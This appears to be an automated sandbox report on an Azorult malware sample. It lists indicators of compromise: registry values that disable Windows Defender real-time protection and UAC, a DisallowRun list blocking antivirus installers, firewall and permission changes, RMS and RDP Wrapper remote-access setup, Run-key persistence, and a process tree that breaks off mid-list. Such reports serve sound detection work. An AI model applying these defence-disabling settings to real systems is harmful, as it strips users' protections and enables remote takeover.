azorult | da6062107b3fa8e3e95c3fe0bf63e065a39e01016217ba841dac9e34b2cd4b64

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

Hidden Files and Directories

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5444	netsh.exe
1792	netsh.exe
5424	netsh.exe
5852	netsh.exe
5844	netsh.exe
5324	netsh.exe
5172	netsh.exe
5652	netsh.exe
5144	netsh.exe
5416	netsh.exe
5392	netsh.exe
5356	netsh.exe
2980	netsh.exe
5872	netsh.exe
5412	netsh.exe
5264	netsh.exe
5208	netsh.exe
5400	netsh.exe
3840	netsh.exe
5548	netsh.exe
2300	netsh.exe
5408	netsh.exe
2164	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

pid	Process
6076	attrib.exe
5908	attrib.exe
5264	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000100000002a961-378.dat	acprotect
behavioral1/files/0x000100000002a960-377.dat	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000100000002a95e-338.dat	aspack_v212_v242
behavioral1/files/0x000100000002a95d-379.dat	aspack_v212_v242

Executes dropped EXE 21 IoCs

pid	Process
2700	wini.exe
1168	winit.exe
3916	cheat.exe
2228	ink.exe
3184	taskhost.exe
4112	rutserv.exe
2480	P.exe
4644	rutserv.exe
4648	rutserv.exe
4552	rutserv.exe
4564	rfusclient.exe
5036	rfusclient.exe
2764	R8.exe
5736	winlog.exe
5256	winlogon.exe
5812	rfusclient.exe
4112	taskhostw.exe
5972	winlogon.exe
5700	Rar.exe
3184	RDPWInst.exe
5168	RDPWInst.exe

Loads dropped DLL 1 IoCs

pid	Process
1836	svchost.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5808	icacls.exe
332	icacls.exe
3408	icacls.exe
5428	icacls.exe
4720	icacls.exe
6020	icacls.exe
6100	icacls.exe
4436	icacls.exe
5336	icacls.exe
1760	icacls.exe
5832	icacls.exe
4828	icacls.exe
5780	icacls.exe
2948	icacls.exe
5844	icacls.exe
5752	icacls.exe
5224	icacls.exe
5800	icacls.exe
4548	icacls.exe
5216	icacls.exe
6024	icacls.exe
5216	icacls.exe
2300	icacls.exe
4168	icacls.exe
5820	icacls.exe
4720	icacls.exe
5420	icacls.exe
5800	icacls.exe
5860	icacls.exe
6100	icacls.exe
5132	icacls.exe
5552	icacls.exe
2228	icacls.exe
4260	icacls.exe
6084	icacls.exe
5660	icacls.exe
5704	icacls.exe
3468	icacls.exe
5352	icacls.exe
6048	icacls.exe
4652	icacls.exe
4392	icacls.exe
2628	icacls.exe
5304	icacls.exe
5448	icacls.exe
5216	icacls.exe
5260	icacls.exe
1592	icacls.exe
5352	icacls.exe
5380	icacls.exe
332	icacls.exe
1080	icacls.exe
1436	icacls.exe
2356	icacls.exe
4260	icacls.exe
5704	icacls.exe
5164	icacls.exe
5196	icacls.exe
5756	icacls.exe
5900	icacls.exe
4704	icacls.exe
5488	icacls.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000100000002a961-378.dat	upx
behavioral1/files/0x000100000002a960-377.dat	upx
behavioral1/files/0x000200000002a972-420.dat	upx
behavioral1/memory/5256-428-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000100000002a987-476.dat	upx
behavioral1/memory/5972-496-0x00000000007A0000-0x000000000088C000-memory.dmp	upx
behavioral1/memory/5256-498-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/5972-499-0x00000000007A0000-0x000000000088C000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
80	raw.githubusercontent.com
87	iplogger.org
61	raw.githubusercontent.com
62	raw.githubusercontent.com
63	iplogger.org

Modifies WinLogon 2 TTPs 1 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000100000002a95f-290.dat	autoit_exe
behavioral1/files/0x000100000002a968-321.dat	autoit_exe
behavioral1/files/0x000100000002a977-438.dat	autoit_exe
behavioral1/memory/5972-496-0x00000000007A0000-0x000000000088C000-memory.dmp	autoit_exe
behavioral1/memory/5972-499-0x00000000007A0000-0x000000000088C000-memory.dmp	autoit_exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3980	sc.exe
1956	sc.exe
2228	sc.exe
4408	sc.exe
3024	sc.exe
2980	sc.exe
1296	sc.exe
2948	sc.exe
1676	sc.exe
764	sc.exe
6088	sc.exe
4904	sc.exe
2408	sc.exe
1156	sc.exe
1900	sc.exe
4064	sc.exe
6072	sc.exe
2448	sc.exe
2556	sc.exe
5020	sc.exe
3556	sc.exe
3408	sc.exe
6056	sc.exe
336	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

pid	Process
5380	schtasks.exe
5700	schtasks.exe
5672	schtasks.exe
2780	schtasks.exe

Delays execution with timeout.exe 6 IoCs

pid	Process
5388	timeout.exe
1156	timeout.exe
6020	timeout.exe
4436	timeout.exe
4404	timeout.exe
6012	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
5232	ipconfig.exe

Kills process with taskkill 5 IoCs

pid	Process
6024	taskkill.exe
5808	taskkill.exe
5996	taskkill.exe
6080	taskkill.exe
2288	taskkill.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-160263616-143223877-1356318919-1000\{485311F0-086C-4D59-BAAC-949CD86BEE07}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000_Classes\Local Settings	R8.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4900	regedit.exe
336	regedit.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3408	WINWORD.EXE
3408	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3156	msedge.exe
3156	msedge.exe
5112	identity_helper.exe
5112	identity_helper.exe
4600	msedge.exe
4600	msedge.exe
2252	msedge.exe
2252	msedge.exe
4636	msedge.exe
4636	msedge.exe
2020	msedge.exe
2020	msedge.exe
2020	msedge.exe
2020	msedge.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
1796	Azorult.exe
4112	rutserv.exe
4112	rutserv.exe
4112	rutserv.exe
4112	rutserv.exe
4112	rutserv.exe
4112	rutserv.exe
4644	rutserv.exe
4644	rutserv.exe
4648	rutserv.exe
4648	rutserv.exe
4552	rutserv.exe
4552	rutserv.exe
4552	rutserv.exe
4552	rutserv.exe
4552	rutserv.exe
4552	rutserv.exe
4564	rfusclient.exe
4564	rfusclient.exe
5752	powershell.exe
5752	powershell.exe
5752	powershell.exe
4112	taskhostw.exe
4112	taskhostw.exe
1836	svchost.exe
1836	svchost.exe
1836	svchost.exe
1836	svchost.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe
4112	taskhostw.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4112	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
672	Process not Found
672	Process not Found
672	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5812	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4112	rutserv.exe
Token: SeDebugPrivilege	4648	rutserv.exe
Token: SeTakeOwnershipPrivilege	4552	rutserv.exe
Token: SeTcbPrivilege	4552	rutserv.exe
Token: SeTcbPrivilege	4552	rutserv.exe
Token: SeDebugPrivilege	6024	taskkill.exe
Token: SeDebugPrivilege	5808	taskkill.exe
Token: SeDebugPrivilege	5752	powershell.exe
Token: SeDebugPrivilege	5996	taskkill.exe
Token: SeAuditPrivilege	4092	svchost.exe
Token: SeDebugPrivilege	3184	RDPWInst.exe
Token: SeAuditPrivilege	1836	svchost.exe
Token: SeDebugPrivilege	6080	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
3408	WINWORD.EXE
3408	WINWORD.EXE
3408	WINWORD.EXE
3408	WINWORD.EXE
1796	Azorult.exe
2700	wini.exe
1168	winit.exe
3916	cheat.exe
2228	ink.exe
3184	taskhost.exe
2480	P.exe
4112	rutserv.exe
4644	rutserv.exe
4648	rutserv.exe
4552	rutserv.exe
2764	R8.exe
5256	winlogon.exe
4112	taskhostw.exe
5972	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 788 wrote to memory of 668	788	msedge.exe	81
PID 788 wrote to memory of 668	788	msedge.exe	81
PID 3408 wrote to memory of 2276	3408	WINWORD.EXE	118
PID 3408 wrote to memory of 2276	3408	WINWORD.EXE	118
PID 1796 wrote to memory of 2700	1796	Azorult.exe	122
PID 1796 wrote to memory of 2700	1796	Azorult.exe	122
PID 1796 wrote to memory of 2700	1796	Azorult.exe	122
PID 2700 wrote to memory of 1900	2700	wini.exe	123
PID 2700 wrote to memory of 1900	2700	wini.exe	123
PID 2700 wrote to memory of 1900	2700	wini.exe	123
PID 2700 wrote to memory of 1168	2700	wini.exe	124
PID 2700 wrote to memory of 1168	2700	wini.exe	124
PID 2700 wrote to memory of 1168	2700	wini.exe	124
PID 1900 wrote to memory of 692	1900	WScript.exe	125
PID 1900 wrote to memory of 692	1900	WScript.exe	125
PID 1900 wrote to memory of 692	1900	WScript.exe	125
PID 692 wrote to memory of 4900	692	cmd.exe	127
PID 692 wrote to memory of 4900	692	cmd.exe	127
PID 692 wrote to memory of 4900	692	cmd.exe	127
PID 692 wrote to memory of 336	692	cmd.exe	128
PID 692 wrote to memory of 336	692	cmd.exe	128
PID 692 wrote to memory of 336	692	cmd.exe	128
PID 692 wrote to memory of 4404	692	cmd.exe	129
PID 692 wrote to memory of 4404	692	cmd.exe	129
PID 692 wrote to memory of 4404	692	cmd.exe	129
PID 1796 wrote to memory of 3916	1796	Azorult.exe	130
PID 1796 wrote to memory of 3916	1796	Azorult.exe	130
PID 1796 wrote to memory of 3916	1796	Azorult.exe	130
PID 1796 wrote to memory of 2228	1796	Azorult.exe	131
PID 1796 wrote to memory of 2228	1796	Azorult.exe	131
PID 1796 wrote to memory of 2228	1796	Azorult.exe	131
PID 1796 wrote to memory of 1988	1796	Azorult.exe	132
PID 1796 wrote to memory of 1988	1796	Azorult.exe	132
PID 1796 wrote to memory of 1988	1796	Azorult.exe	132
PID 1988 wrote to memory of 2448	1988	cmd.exe	135
PID 1988 wrote to memory of 2448	1988	cmd.exe	135
PID 1988 wrote to memory of 2448	1988	cmd.exe	135
PID 3916 wrote to memory of 3184	3916	cheat.exe	134
PID 3916 wrote to memory of 3184	3916	cheat.exe	134
PID 3916 wrote to memory of 3184	3916	cheat.exe	134
PID 692 wrote to memory of 4112	692	cmd.exe	136
PID 692 wrote to memory of 4112	692	cmd.exe	136
PID 692 wrote to memory of 4112	692	cmd.exe	136
PID 1796 wrote to memory of 2732	1796	Azorult.exe	137
PID 1796 wrote to memory of 2732	1796	Azorult.exe	137
PID 1796 wrote to memory of 2732	1796	Azorult.exe	137
PID 3184 wrote to memory of 2480	3184	taskhost.exe	138
PID 3184 wrote to memory of 2480	3184	taskhost.exe	138
PID 3184 wrote to memory of 2480	3184	taskhost.exe	138
PID 1796 wrote to memory of 4064	1796	Azorult.exe	139
PID 1796 wrote to memory of 4064	1796	Azorult.exe	139
PID 1796 wrote to memory of 4064	1796	Azorult.exe	139
PID 1796 wrote to memory of 8	1796	Azorult.exe	140
PID 1796 wrote to memory of 8	1796	Azorult.exe	140
PID 1796 wrote to memory of 8	1796	Azorult.exe	140
PID 1796 wrote to memory of 4792	1796	Azorult.exe	141
PID 1796 wrote to memory of 4792	1796	Azorult.exe	141
PID 1796 wrote to memory of 4792	1796	Azorult.exe	141
PID 1796 wrote to memory of 4648	1796	Azorult.exe	142
PID 1796 wrote to memory of 4648	1796	Azorult.exe	142
PID 1796 wrote to memory of 4648	1796	Azorult.exe	142
PID 1796 wrote to memory of 4564	1796	Azorult.exe	143
PID 1796 wrote to memory of 4564	1796	Azorult.exe	143
PID 1796 wrote to memory of 4564	1796	Azorult.exe	143

Views/modifies file attributes 1 TTPs 6 IoCs

Hidden Files and Directories

pid	Process
5452	attrib.exe
6032	attrib.exe
3484	attrib.exe
5264	attrib.exe
6076	attrib.exe
5908	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Suspicious use of WriteProcessMemory
PID:788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffcc7103cb8,0x7ffcc7103cc8,0x7ffcc7103cd8
  2⤵
  PID:668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
1⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
1⤵
PID:240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
1⤵
PID:2320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
1⤵
PID:3812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
1⤵
PID:4640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
1⤵
PID:2952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
1⤵
PID:4572

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:8
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3684 /prefetch:8
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
1⤵
PID:4532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
